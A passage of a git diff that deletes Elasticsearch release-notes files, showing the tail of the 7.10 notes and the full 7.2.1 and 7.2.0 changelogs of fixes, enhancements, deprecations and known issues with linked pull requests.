{es-issue}60824[#60824]) -* Make sure non-collecting aggs include sub-aggs {es-pull}64214[#64214] (issue: {es-issue}64142[#64142]) -* Composite aggregation must check live docs when the index is sorted {es-pull}63864[#63864] -* Fix broken parent and child aggregator {es-pull}63811[#63811] - -Allocation:: -* Fix scheduling of ClusterInfoService#refresh {es-pull}59880[#59880] - -Authorization:: -* Fix doc-update interceptor for indices with DLS and FLS {es-pull}61516[#61516] -* Report anonymous roles in authenticate response {es-pull}61355[#61355] (issues: {es-issue}47195[#47195], {es-issue}53453[#53453], {es-issue}57711[#57711], {es-issue}57853[#57853]) -* Add view_index_metadata privilege over metricbeat-* for monitoring agent {es-pull}63750[#63750] (issue: {es-issue}63750[#63750]) - -CRUD:: -* Propagate forceExecution when acquiring permit {es-pull}60634[#60634] (issue: {es-issue}60359[#60359]) - -Cluster Coordination:: -* Reduce allocations when persisting cluster state {es-pull}61159[#61159] - -Distributed:: -* Fix cluster health rest api wait_for_no_initializing_shards bug {es-pull}58379[#58379] -* Fix cluster health when closing {es-pull}61709[#61709] - -Engine:: -* Fix estimate size of translog operations {es-pull}59206[#59206] - -Features/ILM+SLM:: -* Fix ILM history index settings {es-pull}61880[#61880] (issues: {es-issue}61457[#61457], {es-issue}61863[#61863]) -* Ensure cancelled SLM jobs do not continue to run {es-pull}63762[#63762] (issue: {es-issue}63754[#63754]) - -Features/Java Low Level REST Client:: -* Handle non-default port in Cloud-Id {es-pull}61581[#61581] - -Features/Stats:: -* Remove sporadic min/max usage estimates from stats {es-pull}59755[#59755] - -Features/Watcher:: -* Correct the query dsl for watching elasticsearch version {es-pull}58321[#58321] (issue: {es-issue}58261[#58261]) -* Fix passing params to template or script failed in watcher {es-pull}58559[#58559] (issue: {es-issue}57625[#57625]) - -Geo:: -* Fix wrong NaN comparison {es-pull}61795[#61795] (issue: {es-issue}48207[#48207]) - -Infra/Core:: -* Throws IndexNotFoundException in TransportGetAction for unknown System indices {es-pull}61785[#61785] (issue: {es-issue}57936[#57936]) -* Handle missing logstash index exceptions {es-pull}63698[#63698] -* XPack Usage API should run on MANAGEMENT threads {es-pull}64160[#64160] - -Infra/Packaging:: -* Allow running the Docker image with a non-default group {es-pull}61194[#61194] (issue: {es-issue}60864[#60864]) -* Set the systemd initial timeout to 75 seconds {es-pull}60345[#60345] (issue: {es-issue}60140[#60140]) - -Machine Learning:: -* Adjusting inference processor to support foreach usage {es-pull}60915[#60915] (issue: {es-issue}60867[#60867]) -* Get data frame analytics jobs stats API can return multiple responses if more than one error {es-pull}60900[#60900] (issue: {es-issue}60876[#60876]) -* Do not mark the data frame analytics job as FAILED when a failure occurs after the node is shutdown {es-pull}61331[#61331] (issue: {es-issue}60596[#60596]) -* Improve handling of exception while starting data frame analytics process {es-pull}61838[#61838] (issue: {es-issue}61704[#61704]) -* Fix progress on resume after final training has completed for classification and regression. Previously, progress was shown stuck at zero for final training. 
{ml-pull}1443[#1443] -* Avoid potential "Failed to compute quantile" and "No values added to quantile sketch" log errors training regression and classification models if there are features with mostly missing values {ml-pull}1500[#1500] -* Correct the anomaly detection job model state `min_version` {ml-pull}1546[#1546] - -Mapping:: -* Improve 'ignore_malformed' handling for dates {es-pull}60211[#60211] (issue: {es-issue}52634[#52634]) - -Network:: -* Let `isInetAddress` utility understand the scope ID on ipv6 {es-pull}60172[#60172] (issue: {es-issue}60115[#60115]) -* Suppress noisy SSL exceptions {es-pull}61359[#61359] - -Search:: -* Allows nanosecond resolution in search_after {es-pull}60328[#60328] (issue: {es-issue}52424[#52424]) -* Consolidate validation for 'docvalue_fields' {es-pull}59473[#59473] -* Correct how field retrieval handles multifields and copy_to {es-pull}61309[#61309] (issue: {es-issue}61033[#61033]) -* Apply boost only once for distance_feature query {es-pull}63767[#63767] -* Fixed NullPointerException in `significant_text` aggregation when field does not exist {es-pull}64144[#64144] (issue: {es-issue}64045[#64045]) -* Fix async search to retry updates on version conflict {es-pull}63652[#63652] (issue: {es-issue}63213[#63213]) -* Fix sorted query when date_nanos is used as the numeric_type {es-pull}64183[#64183] (issue: {es-issue}63719[#63719]) - -Snapshot/Restore:: -* Avoid listener call under SparseFileTracker#mutex {es-pull}61626[#61626] (issue: {es-issue}61520[#61520]) -* Ensure repo not in use for wildcard repo deletes {es-pull}60947[#60947] -* Fix Test Failure in testCorrectCountsForDoneShards {es-pull}60254[#60254] (issue: {es-issue}60247[#60247]) -* Minimize cache file locking during prewarming {es-pull}61837[#61837] (issue: {es-issue}58658[#58658]) -* Prevent snapshots to be mounted as system indices {es-pull}61517[#61517] (issue: {es-issue}60522[#60522]) -* Make Searchable Snapshot's CacheFile Lock less {es-pull}63911[#63911] (issue: {es-issue}63586[#63586]) -* Don't Generate an Index Setting History UUID unless it's supported {es-pull}64213[#64213] (issue: {es-issue}64152[#64152]) - -SQL:: -* Allow unescaped wildcard (*) in LIKE pattern {es-pull}63428[#63428] (issue: {es-issue}55108[#55108]) -* Validate integer paramete in string functions {es-pull}63728[#63728] (issue: {es-issue}58923[#58923]) -* Remove filter from field_caps requests {es-pull}63840[#63840] (issue: {es-issue}63832[#63832]) - - - -[[upgrade-7.10.0]] -[discrete] -=== Upgrades - -Infra/Packaging:: -* Upgrade bundled JDK to 15.0.1 and switch to AdoptOpenJDK {es-pull}64253[#64253] - -Store:: -* Upgrade to Lucene-8.7.0 {es-pull}64532[#64532] diff --git a/docs/reference/release-notes/7.2.asciidoc b/docs/reference/release-notes/7.2.asciidoc deleted file mode 100644 index a980e370cdd..00000000000 --- a/docs/reference/release-notes/7.2.asciidoc +++ /dev/null @@ -1,576 +0,0 @@ -[[release-notes-7.2.1]] -== {es} version 7.2.1 - -Also see <>. 
- -[[enhancement-7.2.1]] -[discrete] -=== Enhancements - -Infra/Core:: -* Add default CLI JVM options {es-pull}44545[#44545] (issue: {es-issue}42021[#42021]) - -Infra/Plugins:: -* Do not checksum all bytes at once in plugin install {es-pull}44649[#44649] (issue: {es-issue}44545[#44545]) - -Machine Learning:: -* Improve message when native controller cannot connect {es-pull}43565[#43565] (issue: {es-issue}42341[#42341]) -* Introduce a setting for the process connect timeout {es-pull}43234[#43234] - -[[bug-7.2.1]] -[discrete] -=== Bug fixes - -Analysis:: -* Issue deprecation warnings for preconfigured delimited_payload_filter {es-pull}43684[#43684] (issues: {es-issue}26625[#26625], {es-issue}43568[#43568]) - -Authentication:: -* Fix credential encoding for OIDC token request {es-pull}43808[#43808] (issue: {es-issue}43709[#43709]) - -Data Frame:: -* Reorder format priorities in dest mapping {es-pull}43602[#43602] -* Adjust error message {es-pull}43455[#43455] -* Size the GET stats search by number of Ids requested {es-pull}43206[#43206] (issue: {es-issue}43203[#43203]) - -Distributed:: -* Fix DefaultShardOperationFailedException subclass xcontent serialization {es-pull}43435[#43435] (issue: {es-issue}43423[#43423]) - -Engine:: -* AsyncIOProcessor preserve thread context {es-pull}43729[#43729] - -Features/CAT APIs:: -* Fix indices shown in _cat/indices {es-pull}43286[#43286] (issues: {es-issue}33888[#33888], {es-issue}38824[#38824], {es-issue}39933[#39933]) - -Features/ILM:: -* Account for node versions during allocation in ILM Shrink {es-pull}43300[#43300] (issue: {es-issue}41879[#41879]) - -Features/Indices APIs:: -* Check shard limit after applying index templates {es-pull}44619[#44619] (issues: {es-issue}34021[#34021], {es-issue}44567[#44567], {es-issue}44619[#44619]) -* Validate index settings after applying templates {es-pull}44612[#44612] (issues: {es-issue}34021[#34021], {es-issue}44567[#44567]) -* Prevent NullPointerException in TransportRolloverAction {es-pull}43353[#43353] (issue: {es-issue}43296[#43296]) - -Infra/Packaging:: -* Restore setting up temp dir for windows service {es-pull}44541[#44541] -* Fix the bundled jdk flag to be passed through windows startup {es-pull}43502[#43502] - -Machine Learning:: -* Fix datafeed checks when a concrete remote index is present {es-pull}43923[#43923] -* Don't persist model state at the end of lookback if the lookback did not generate any input {ml-pull}527[#527] (issue: {ml-issue}519[#519]) -* Don't write model size stats when job is closed without any input {ml-pull}516[#516] (issue: {ml-issue}394[#394]) - -Mapping:: -* Prevent types deprecation warning for indices.exists requests {es-pull}43963[#43963] (issue: {es-issue}43905[#43905]) -* Add include_type_name in indices.exitst REST API spec {es-pull}43910[#43910] (issue: {es-issue}43905[#43905]) -* Fix index_prefix sub field name on nested text fields {es-pull}43862[#43862] (issue: {es-issue}43741[#43741]) - -Network:: -* Reconnect remote cluster when seeds are changed {es-pull}43379[#43379] (issue: {es-issue}37799[#37799]) - -SQL:: -* Fix NPE in case of subsequent scrolled requests for a CSV/TSV formatted response {es-pull}43365[#43365] (issue: {es-issue}43327[#43327]) -* Increase hard limit for sorting on aggregates {es-pull}43220[#43220] (issue: {es-issue}43168[#43168]) - -Search:: -* Fix wrong logic in `match_phrase` query with multi-word synonyms {es-pull}43941[#43941] (issue: {es-issue}43308[#43308]) -* Fix UOE on search requests that match a sparse role query {es-pull}43668[#43668] 
(issue: {es-issue}42857[#42857]) -* Fix propagation of enablePositionIncrements in QueryStringQueryBuilder {es-pull}43578[#43578] (issue: {es-issue}43574[#43574]) -* Fix round up of date range without rounding {es-pull}43303[#43303] (issue: {es-issue}43277[#43277]) - -Security:: -* SecurityIndexSearcherWrapper doesn't always carry over caches and similarity {es-pull}43436[#43436] - - -[[release-notes-7.2.0]] -== {es} version 7.2.0 - -Also see <>. - -[discrete] -=== Known issues - -* Applying deletes or updates on an index after it has been shrunk may corrupt -the index. In order to prevent this issue, it is recommended to stop shrinking -read-write indices. For read-only indices, it is recommended to force-merge -indices after shrinking, which significantly reduces the likeliness of this -corruption in the case that deletes/updates would be applied by mistake. This -bug is fixed in {es} 7.7 and later versions. More details can be found on the -https://issues.apache.org/jira/browse/LUCENE-9300[corresponding issue]. - -* Indices created in 6.x with <> and <> fields using formats -that are incompatible with java.time patterns will cause parsing errors, incorrect date calculations or wrong search results. -https://github.com/elastic/elasticsearch/pull/52555 -This is fixed in {es} 7.7 and later versions. - -[[breaking-7.2.0]] -[discrete] -=== Breaking changes - -Cluster Coordination:: -* Reject port ranges in `discovery.seed_hosts` {es-pull}41404[#41404] (issue: {es-issue}40786[#40786]) - - -[[breaking-java-7.2.0]] -[discrete] -=== Breaking Java changes - -Infra/Plugins:: -* Remove IndexStore and DirectoryService {es-pull}42446[#42446] - - -[[deprecation-7.2.0]] -[discrete] -=== Deprecations - -Authorization:: -* Deprecate permission over aliases {es-pull}38059[#38059] - -Features/Features:: -* Add deprecation check for ILM poll interval <1s {es-pull}41096[#41096] (issue: {es-issue}39163[#39163]) - -Mapping:: -* Enforce Completion Context Limit {es-pull}38675[#38675] (issue: {es-issue}32741[#32741]) - -Reindex:: -* Reindex from remote deprecation of escaped index {es-pull}41005[#41005] (issue: {es-issue}40303[#40303]) - -Search:: -* Deprecate using 0 value for `min_children` in `has_child` query #41548 {es-pull}41555[#41555] (issue: {es-issue}41548[#41548]) -* Deprecate support for first line empty in msearch API {es-pull}41442[#41442] (issue: {es-issue}41011[#41011]) - -Security:: -* Deprecate the native realm migration tool {es-pull}42142[#42142] - -[[feature-7.2.0]] -[discrete] -=== New features - -Authentication:: -* Add an OpenID Connect authentication realm {es-pull}40674[#40674] - -Distributed:: -* Add support for replicating closed indices {es-pull}39499[#39499] (issues: {es-issue}33888[#33888], {es-issue}33903[#33903], {es-issue}37359[#37359], {es-issue}37413[#37413], {es-issue}38024[#38024], {es-issue}38326[#38326], {es-issue}38327[#38327], {es-issue}38329[#38329], {es-issue}38421[#38421], {es-issue}38631[#38631], {es-issue}38767[#38767], {es-issue}38854[#38854], {es-issue}38955[#38955], {es-issue}39006[#39006], {es-issue}39110[#39110], {es-issue}39186[#39186], {es-issue}39249[#39249], {es-issue}39364[#39364]) - -Infra/Scripting:: -* Add painless string split function (splitOnToken) {es-pull}39772[#39772] (issue: {es-issue}20952[#20952]) -* Add a Painless Context REST API {es-pull}39382[#39382] - -Machine Learning:: -* Add data frame feature {es-pull}38934[#38934] - -Ranking:: -* Expose proximity boosting {es-pull}39385[#39385] (issue: {es-issue}33382[#33382]) -* Add randomScore 
function in script_score query {es-pull}40186[#40186] (issue: {es-issue}31461[#31461]) - -SQL:: -* Add initial geo support {es-pull}42031[#42031] (issues: {es-issue}29872[#29872], {es-issue}37206[#37206]) -* Implement CASE... WHEN... THEN... ELSE... END {es-pull}41349[#41349] (issue: {es-issue}36200[#36200]) -* Introduce MAD (MedianAbsoluteDeviation) aggregation {es-pull}40048[#40048] (issue: {es-issue}39597[#39597]) -* Introduce SQL TIME data type {es-pull}39802[#39802] (issue: {es-issue}38174[#38174]) -* Introduce the columnar option for REST requests {es-pull}39287[#39287] (issue: {es-issue}37702[#37702]) - -Snapshot/Restore:: -* Allow snapshotting replicated closed indices {es-pull}39644[#39644] (issue: {es-issue}33888[#33888]) - -Suggesters:: -* Search as you type fieldmapper {es-pull}35600[#35600] (issue: {es-issue}33160[#33160]) - -Features/Ingest:: -* Add HTML strip processor {es-pull}41888[#41888] - -Search:: -* Add an option to force the numeric type of a field sort {es-pull}38095[#38095] (issue: {es-issue}32601[#32601]) - - -[[enhancement-7.2.0]] -[discrete] -=== Enhancements - -Aggregations:: -* Use the breadth first collection mode for significant terms aggs. {es-pull}29042[#29042] (issue: {es-issue}28652[#28652]) -* Disallow null/empty or duplicate composite sources {es-pull}41359[#41359] (issue: {es-issue}32414[#32414]) -* Move top-level pipeline aggs out of QuerySearchResult {es-pull}40319[#40319] (issue: {es-issue}40177[#40177]) -* Remove throws IOException from PipelineAggregationBuilder#create {es-pull}40222[#40222] -* Better error messages when pipelines reference incompatible aggs {es-pull}40068[#40068] (issues: {es-issue}25273[#25273], {es-issue}30152[#30152]) -* Do not allow Sampler to allocate more than maxDoc size, better CB accounting {es-pull}39381[#39381] (issue: {es-issue}34269[#34269]) -* Force selection of calendar or fixed intervals in date histo agg {es-pull}33727[#33727] - -Allocation:: -* Reset failed allocation counter before executing routing commands {es-pull}41050[#41050] (issue: {es-issue}39546[#39546]) -* Supporting automatic release of index blocks. 
Closes #39334 {es-pull}40338[#40338] (issue: {es-issue}39334[#39334]) - -Analysis:: -* Add flag to declare token filters as updateable {es-pull}36103[#36103] (issue: {es-issue}29051[#29051]) - -Authentication:: -* Hash token values for storage {es-pull}41792[#41792] (issues: {es-issue}39631[#39631], {es-issue}40765[#40765]) -* Security Tokens moved to a new separate index {es-pull}40742[#40742] (issue: {es-issue}34454[#34454]) -* Support concurrent refresh of refresh tokens {es-pull}39631[#39631] (issue: {es-issue}36872[#36872]) -* Add enabled status for token and api key service {es-pull}38687[#38687] (issue: {es-issue}38535[#38535]) - -Authorization:: -* Support mustache templates in role mappings {es-pull}39984[#39984] (issue: {es-issue}36567[#36567]) -* Add .code_internal-* index pattern to kibana user {es-pull}42247[#42247] -* Add granular API key privileges {es-pull}41488[#41488] (issue: {es-issue}40031[#40031]) -* Add Kibana application privileges for monitoring and ml reserved roles {es-pull}40651[#40651] -* Support roles with application privileges against wildcard applications {es-pull}40398[#40398] - -CCR:: -* Replay history of operations in remote recovery {es-pull}39153[#39153] (issues: {es-issue}35975[#35975], {es-issue}39000[#39000]) - -CRUD:: -* Add details to BulkShardRequest#getDescription() {es-pull}41711[#41711] -* Add version-based validation to reindex requests {es-pull}38504[#38504] (issue: {es-issue}37855[#37855]) - -Cluster Coordination:: -* Add GET /_cluster/master endpoint {es-pull}40047[#40047] -* Only connect to new nodes on new cluster state {es-pull}39629[#39629] (issues: {es-issue}29025[#29025], {es-issue}31547[#31547]) -* Add has_voting_exclusions flag to cluster health output {es-pull}38568[#38568] - -Data Frame:: -* Persist and restore checkpoint and position {es-pull}41942[#41942] (issue: {es-issue}41752[#41752]) -* Complete the Data Frame task on stop {es-pull}41752[#41752] -* Data Frame stop all {es-pull}41156[#41156] -* Data Frame HLRC Get Stats API {es-pull}40327[#40327] -* Data Frame HLRC Get API {es-pull}40209[#40209] -* Data Frame HLRC Preview API {es-pull}40206[#40206] -* Data Frame HLRC start & stop APIs {es-pull}40154[#40154] (issue: {es-issue}29546[#29546]) -* Add Data Frame client to the Java HLRC {es-pull}39921[#39921] - -Discovery-Plugins:: -* Upgrade SDK and test discovery-ec2 credential providers {es-pull}41732[#41732] - -Distributed:: -* Prevent in-place downgrades and invalid upgrades {es-pull}41731[#41731] -* Add index name to cluster block exception {es-pull}41489[#41489] (issue: {es-issue}40870[#40870]) -* Noop peer recoveries on closed index {es-pull}41400[#41400] (issue: {es-issue}33888[#33888]) -* Do not trim unsafe commits when open readonly engine {es-pull}41041[#41041] (issue: {es-issue}33888[#33888]) -* Avoid background sync on relocated primary {es-pull}40800[#40800] (issue: {es-issue}40731[#40731]) -* No mapper service and index caches for replicated closed indices {es-pull}40423[#40423] -* Add support for replicating closed indices {es-pull}39499[#39499] (issues: {es-issue}33888[#33888], {es-issue}33903[#33903], {es-issue}37359[#37359], {es-issue}37413[#37413], {es-issue}38024[#38024], {es-issue}38326[#38326], {es-issue}38327[#38327], {es-issue}38329[#38329], {es-issue}38421[#38421], {es-issue}38631[#38631], {es-issue}38767[#38767], {es-issue}38854[#38854], {es-issue}38955[#38955], {es-issue}39006[#39006], {es-issue}39110[#39110], {es-issue}39186[#39186], {es-issue}39249[#39249], {es-issue}39364[#39364]) - -Docs 
Infrastructure:: -* Docs: Simplifying setup by using module configuration variant syntax {es-pull}40879[#40879] - -Engine:: -* Simplify initialization of max_seq_no of updates {es-pull}41161[#41161] (issues: {es-issue}33842[#33842], {es-issue}40249[#40249]) -* Adjust init map size of user data of index commit {es-pull}40965[#40965] -* Don't mark shard as refreshPending on stats fetching {es-pull}40458[#40458] (issues: {es-issue}33835[#33835], {es-issue}33847[#33847]) -* Reject illegal flush parameters {es-pull}40213[#40213] (issue: {es-issue}36342[#36342]) -* Always fail engine if delete operation fails {es-pull}40117[#40117] (issue: {es-issue}33256[#33256]) -* Combine overriddenOps and skippedOps in translog {es-pull}39771[#39771] (issue: {es-issue}33317[#33317]) -* Return cached segments stats if `include_unloaded_segments` is true {es-pull}39698[#39698] (issue: {es-issue}39512[#39512]) -* Allow inclusion of unloaded segments in stats {es-pull}39512[#39512] -* Never block on scheduled refresh if a refresh is running {es-pull}39462[#39462] -* Expose external refreshes through the stats API {es-pull}38643[#38643] (issue: {es-issue}36712[#36712]) -* Make setting index.translog.sync_interval be dynamic {es-pull}37382[#37382] (issue: {es-issue}32763[#32763]) - -Features/CAT APIs:: -* Add start and stop time to cat recovery API {es-pull}40378[#40378] -* Return 0 for negative "free" and "total" memory reported by the OS {es-pull}42725[#42725] (issue: {es-issue}42157[#42157]) - -Features/Indices APIs:: -* Introduce aliases version {es-pull}41397[#41397] (issue: {es-issue}41396[#41396]) -* Improve error message for absence of indices {es-pull}39789[#39789] (issues: {es-issue}38964[#38964], {es-issue}39296[#39296]) -* Improved error message for absence of indices closes #38964 {es-pull}39296[#39296] - -Features/Java High Level REST Client:: -* Added param ignore_throttled=false when indicesOptions.ignoreThrottle… {es-pull}42393[#42393] (issue: {es-issue}42358[#42358]) -* Ignore 409 conflict in reindex responses {es-pull}39543[#39543] - -Features/Monitoring:: -* Add packaging to cluster stats response {es-pull}41048[#41048] (issue: {es-issue}39378[#39378]) - -Geo:: -* Improve accuracy for Geo Centroid Aggregation {es-pull}41033[#41033] (issue: {es-issue}41032[#41032]) -* Add support for z values to libs/geo classes {es-pull}38921[#38921] -* Add ST_WktToSQL function {es-pull}35416[#35416] (issue: {es-issue}29872[#29872]) - -Infra/Core:: -* Validate non-secure settings are not in keystore {es-pull}42209[#42209] (issue: {es-issue}41831[#41831]) -* Implement XContentParser.genericMap and XContentParser.genericMapOrdered methods {es-pull}42059[#42059] -* Remove manual parsing of JVM options {es-pull}41962[#41962] (issue: {es-issue}30684[#30684]) -* Clarify some ToXContent implementations behaviour {es-pull}41000[#41000] (issue: {es-issue}16347[#16347]) -* Remove String interning from `o.e.index.Index`. 
{es-pull}40350[#40350] (issue: {es-issue}40263[#40263]) -* Do not swallow exceptions in TimedRunnable {es-pull}39856[#39856] (issue: {es-issue}36137[#36137]) - -Infra/Logging:: -* Reduce garbage from allocations in DeprecationLogger {es-pull}38780[#38780] (issues: {es-issue}35754[#35754], {es-issue}37411[#37411], {es-issue}37530[#37530]) - -Infra/Packaging:: -* Clearer error message - installing windows service {es-pull}33804[#33804] - -Infra/Resiliency:: -* Limit max direct memory size to half of heap size {es-pull}42006[#42006] (issues: {es-issue}41954[#41954], {es-issue}41962[#41962]) - -Infra/Scripting:: -* Add implicit this for class binding in Painless {es-pull}40285[#40285] -* Whitelist geo methods for Painless {es-pull}40180[#40180] (issue: {es-issue}24946[#24946]) - -Machine Learning:: -* Improve message misformation error in file structure finder {es-pull}42175[#42175] -* Improve hard_limit audit message {es-pull}42086[#42086] (issue: {es-issue}38034[#38034]) -* Add validation that rejects duplicate detectors in PutJobAction {es-pull}40967[#40967] (issue: {es-issue}39704[#39704]) -* Add created_by info to usage stats {es-pull}40518[#40518] (issue: {es-issue}38403[#38403]) -* Data frame transforms config HLRC objects {es-pull}39691[#39691] -* Use scaling thread pool and xpack.ml.max_open_jobs cluster-wide dynamic {es-pull}39320[#39320] (issue: {es-issue}29809[#29809]) -* Add task recovery on node change {es-pull}39416[#39416] -* Stop tasks on failure {es-pull}39203[#39203] -* Add _preview endpoint {es-pull}38924[#38924] -* Use hardened compiler options to build 3rd party libraries {ml-pull}453[#453] -* Only select more complex trend models for forecasting if there is evidence that they are needed -{ml-pull}463[#463] -* Improve residual model selection {ml-pull}468[#468] -* Stop linking to libcrypt on Linux {ml-pull}480[#480] -* Improvements to hard_limit audit message {ml-pull}486[#486] -* Increase maximum forecast interval from 8 weeks to a limit based on the amount -of data seen, up to a maximum of 10 years {ml-pull}214[#214] and -{es-pull}41082[#41082] (issue: {es-issue}41103[#41103]) - -Mapping:: -* Updates max dimensions for sparse_vector and dense_vector to 1024. {es-pull}40597[#40597] (issue: {es-issue}40492[#40492]) -* Add ignore_above in ICUCollationKeywordFieldMapper {es-pull}40414[#40414] (issue: {es-issue}40413[#40413]) -* Adding a soft limit to the field name length. 
Closes #33651 {es-pull}40309[#40309] (issue: {es-issue}33651[#33651]) - -Network:: -* Update ciphers for TLSv1.3 and JDK11 if available {es-pull}42082[#42082] (issues: {es-issue}38646[#38646], {es-issue}41385[#41385], {es-issue}41808[#41808]) -* Show SSL usage when security is not disabled {es-pull}40672[#40672] (issue: {es-issue}37433[#37433]) -* Optimize Bulk Message Parsing and Message Length Parsing {es-pull}39634[#39634] (issue: {es-issue}39286[#39286]) -* Netty transport accept plaintext connections {es-pull}39532[#39532] (issue: {es-issue}39531[#39531]) -* Chunk + Throttle Netty Writes {es-pull}39286[#39286] - -Ranking:: -* Improve error message for ln/log with negative results in function score {es-pull}41609[#41609] (issue: {es-issue}41509[#41509]) - -Recovery:: -* Peer recovery should flush at the end {es-pull}41660[#41660] (issues: {es-issue}33888[#33888], {es-issue}39588[#39588], {es-issue}40024[#40024]) -* Peer recovery should not indefinitely retry on mapping error {es-pull}41099[#41099] (issue: {es-issue}40913[#40913]) -* Init global checkpoint after copy commit in peer recovery {es-pull}40823[#40823] (issue: {es-issue}33888[#33888]) -* Ensure sendBatch not called recursively {es-pull}39988[#39988] - -Reindex:: -* Reindex from Remote allow date math {es-pull}40303[#40303] (issue: {es-issue}23533[#23533]) - -SQL:: -* Implement IIF(, , ) {es-pull}41420[#41420] (issue: {es-issue}40917[#40917]) -* Use field caps inside DESCRIBE TABLE as well {es-pull}41377[#41377] (issue: {es-issue}34071[#34071]) -* Implement CURRENT_TIME/CURTIME functions {es-pull}40662[#40662] (issue: {es-issue}40648[#40648]) -* Polish behavior of SYS TABLES command {es-pull}40535[#40535] (issue: {es-issue}40348[#40348]) -* Adjust the precision and scale for drivers {es-pull}40467[#40467] (issue: {es-issue}40357[#40357]) -* Polish parsing of CAST expression {es-pull}40428[#40428] -* Fix classpath discovery on Java 10+ {es-pull}40420[#40420] (issue: {es-issue}40388[#40388]) -* Spec tests now use classpath discovery {es-pull}40388[#40388] (issue: {es-issue}40358[#40358]) -* Implement `::` cast operator {es-pull}38774[#38774] (issue: {es-issue}38717[#38717]) - -Search:: -* Fix range query edge cases {es-pull}41160[#41160] (issue: {es-issue}40937[#40937]) -* Add stopword support to IntervalBuilder {es-pull}39637[#39637] -* Shortcut counts on exists queries {es-pull}39570[#39570] (issue: {es-issue}37475[#37475]) -* Completion suggestions to be reduced once instead of twice {es-pull}39255[#39255] -* Rename SearchRequest#withLocalReduction {es-pull}39108[#39108] -* Tie break search shard iterator comparisons on cluster alias {es-pull}38853[#38853] -* Clean up ShardSearchLocalRequest {es-pull}38574[#38574] -* Handle unmapped fields in _field_caps API {es-pull}34071[#34071] -* Make 0 as invalid value for `min_children` in `has_child` query {es-pull}33073[#33073] (issue: {es-issue}32949[#32949]) -* Analyze numbers, dates and ips with a whitespace analyzer in text queries {es-pull}27395[#27395] -* Add date and date_nanos conversion to the numeric_type sort option {es-pull}40199[#40199] -* Add `use_field` option to intervals query {es-pull}40157[#40157] -* Add overlapping, before, after filters to intervals query {es-pull}38999[#38999] - -Security:: -* Support concurrent refresh of refresh tokens {es-pull}38382[#38382] (issue: {es-issue}36872[#36872]) - -Snapshot/Restore:: -* Remove IndexShard dependency from Repository {es-pull}42213[#42213] -* Add shared access signature authentication support {es-pull}42117[#42117] -* 
Support multiple repositories in get snapshot request {es-pull}41799[#41799] (issue: {es-issue}41210[#41210]) -* Implement Bulk Deletes for GCS Repository {es-pull}41368[#41368] (issue: {es-issue}40322[#40322]) -* Add Bulk Delete Api to BlobStore {es-pull}40322[#40322] (issues: {es-issue}40144[#40144], {es-issue}40250[#40250]) -* Async Snapshot Repository Deletes {es-pull}40144[#40144] (issues: {es-issue}39656[#39656], {es-issue}39657[#39657]) -* Allow snapshotting replicated closed indices {es-pull}39644[#39644] (issue: {es-issue}33888[#33888]) -* Add support for S3 intelligent tiering (#38836) {es-pull}39376[#39376] (issue: {es-issue}38836[#38836]) - -Store:: -* Log missing file exception when failing to read metadata snapshot {es-pull}32920[#32920] - -Suggesters:: -* Tie-break completion suggestions with same score and surface form {es-pull}39564[#39564] - - - -[[bug-7.2.0]] -[discrete] -=== Bug fixes - -Aggregations:: -* Update error message for allowed characters in aggregation names {es-pull}41573[#41573] (issue: {es-issue}41567[#41567]) -* Fix FiltersAggregation NPE when `filters` is empty {es-pull}41459[#41459] (issue: {es-issue}41408[#41408]) -* Fix unmapped field handling in the composite aggregation {es-pull}41280[#41280] - -Allocation:: -* Avoid bubbling up failures from a shard that is recovering {es-pull}42287[#42287] (issues: {es-issue}30919[#30919], {es-issue}40107[#40107]) -* Changed the position of reset counter {es-pull}39678[#39678] (issue: {es-issue}39546[#39546]) - -Analysis:: -* Always use IndexAnalyzers in analyze transport action {es-pull}40769[#40769] (issue: {es-issue}29021[#29021]) -* Fix anaylze NullPointerException when AnalyzeTokenList tokens is null {es-pull}39332[#39332] -* Fix anaylze NullPointerException when AnalyzeTokenList tokens is null {es-pull}39180[#39180] - -Authentication:: -* Refresh remote JWKs on all errors {es-pull}42850[#42850] -* Fix refresh remote JWKS logic {es-pull}42662[#42662] -* Fix settings prefix for realm truststore password {es-pull}42336[#42336] (issues: {es-issue}30241[#30241], {es-issue}41663[#41663]) -* Merge claims from userinfo and ID Token correctly {es-pull}42277[#42277] -* Do not refresh realm cache unless required {es-pull}42169[#42169] (issue: {es-issue}35218[#35218]) -* Amend `prepareIndexIfNeededThenExecute` for security token refresh {es-pull}41697[#41697] -* Fix token Invalidation when retries exhausted {es-pull}39799[#39799] - -Authorization:: -* _cat/indices with Security, hide names when wildcard {es-pull}38824[#38824] (issue: {es-issue}37190[#37190]) - -CCR:: -* CCR should not replicate private/internal settings {es-pull}43067[#43067] (issue: {es-issue}41268[#41268]) - -CRUD:: -* Fix NPE when rejecting bulk updates {es-pull}42923[#42923] - -Cluster Coordination:: -* Reset state recovery after successful recovery {es-pull}42576[#42576] (issue: {es-issue}39172[#39172]) -* Omit non-masters in ClusterFormationFailureHelper {es-pull}41344[#41344] - -Data Frame:: -* Rewrite start and stop to answer with acknowledged {es-pull}42589[#42589] (issue: {es-issue}42450[#42450]) -* Set DF task state to stopped when stopping {es-pull}42516[#42516] (issue: {es-issue}42441[#42441]) -* Add support for fixed_interval, calendar_interval, remove interval {es-pull}42427[#42427] (issues: {es-issue}33727[#33727], {es-issue}42297[#42297]) - -Distributed:: -* Avoid loading retention leases while writing them {es-pull}42620[#42620] (issue: {es-issue}41430[#41430]) -* Do not use ifSeqNo for update requests on mixed cluster 
{es-pull}42596[#42596] (issue: {es-issue}42561[#42561]) -* Prevent order being lost for _nodes API filters {es-pull}42045[#42045] (issue: {es-issue}41885[#41885]) -* Ensure flush happen before closing an index {es-pull}40184[#40184] (issue: {es-issue}36342[#36342]) - -Engine:: -* Account soft deletes for committed segments {es-pull}43126[#43126] (issue: {es-issue}43103[#43103]) -* Fix assertion error when caching the result of a search in a read-only index {es-pull}41900[#41900] (issue: {es-issue}41795[#41795]) -* Close and acquire commit during reset engine fix {es-pull}41584[#41584] (issue: {es-issue}38561[#38561]) - -Features/ILM:: -* Make ILM force merging best effort {es-pull}43246[#43246] (issues: {es-issue}42824[#42824], {es-issue}43245[#43245]) -* Narrow period of Shrink action in which ILM prevents stopping {es-pull}43254[#43254] (issue: {es-issue}43253[#43253]) - -Features/Indices APIs:: -* Add pre-upgrade check to test cluster routing allocation is enabled {es-pull}39340[#39340] (issue: {es-issue}39339[#39339]) - -Features/Ingest:: -* Build local year inside DateFormat lambda {es-pull}42120[#42120] - -Features/Java High Level REST Client:: -* Fixes a bug in AnalyzeRequest.toXContent() {es-pull}42795[#42795] (issues: {es-issue}39670[#39670], {es-issue}42197[#42197]) 